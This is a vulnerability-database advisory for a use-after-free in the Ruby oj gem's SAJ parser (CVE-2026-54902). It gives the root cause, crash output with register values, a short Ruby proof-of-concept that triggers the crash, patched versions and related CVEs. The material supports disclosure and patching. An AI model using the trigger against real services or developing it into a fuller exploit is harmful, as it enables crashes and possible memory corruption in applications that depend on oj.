CVE-2026-54902High▾ TwilightOj: Use-After-Free in Oj::Parser SAJ Long Key Callback
▾ Twilight zone — High severity, or a signal on a lesser flaw
impact 41.3 · likelihood 0.1 · exploitation 0
Need a working PoC? Pro members can cast a request and our team develops one — it lands right here.
Exploit-prediction probability, daily snapshots since Jul 4.
Disclosure to exploitation, from the record and what we observed since indexing it.
Disclosed via GHSA
0.3%
0.3% → 0.4%
Oj::Parser in SAJ mode does not protect cached object keys (≥ 35 bytes) from garbage collection. A Ruby callback that triggers GC inside hash_end can cause the key string to be reclaimed while the C parser still holds a pointer to it. The subsequent access to the freed string VALUE results in a segfault, confirmed by an RIP pointing to address 0x4242 (a canary-style pattern suggesting control over the freed memory's content).
ext/oj/saj2.c / ext/oj/parser.cShort keys (≤ 34 bytes) are stored inline on the C stack and are safe. Long keys (≥ 35 bytes) are stored as heap-allocated Ruby String objects passed to rb_funcall as the key argument. Between the key being resolved and the callback completing, a GC triggered inside the callback (e.g. GC.start) can collect the key String, leaving a dangling VALUE.
Crash output:
long_key_trigger
[BUG] Segmentation fault at 0x0000000000004242
close_object+0x260 /ext/oj/usual.c:405 (calls rb_funcall with freed key)
parse+0x11ff /ext/oj/parser.c:693
parser_parse+0x145 /ext/oj/parser.c:1408
RIP: 0x7fd1b46d68b7 RDI: 0x0000000000004242 (freed key VALUE)
R12: 0x0000000000004242
The freed VALUE 0x4242 shows the attacker-controlled content of the key string was loaded as a pointer — a classic use-after-free indicator.
require 'oj'
class H < Oj::Saj
def add_value(value, key)
GC.start(full_mark: true, immediate_sweep: true) if key == 'x'
end
def hash_start(key); end
def hash_end(key); end
end
p = Oj::Parser.new(:saj)
p.handler = H.new
p.parse('{"' + 'A' * 35 + '":{"x":1}}') # long outer key, GC fires on inner key
oj < 3.17.2Upgrade to a patched release:
oj 3.17.3Connected by shared product, vendor, weakness, or advisory.
CVE-2026-54899HighOj: Use-After-Free in Oj::Parser Symbol Key Cache Toggle
CVE-2026-54897HighOj: Use-After-Free in Oj::Doc Iterators via Reentrant Close
CVE-2026-54898HighOj: Use-After-Free in Oj::Parser SAJ Callback via Input Mutation
CVE-2026-54900HighOj: Negative-Size memcpy in Oj::Parser create_id Attribute Handling
CVE-2026-54901HighOj: Use-After-Free in Oj::Parser array_class/hash_class GC Marking
CVE-2026-54502HighOj: Stack Buffer Overflow in Oj.dump via Large Indent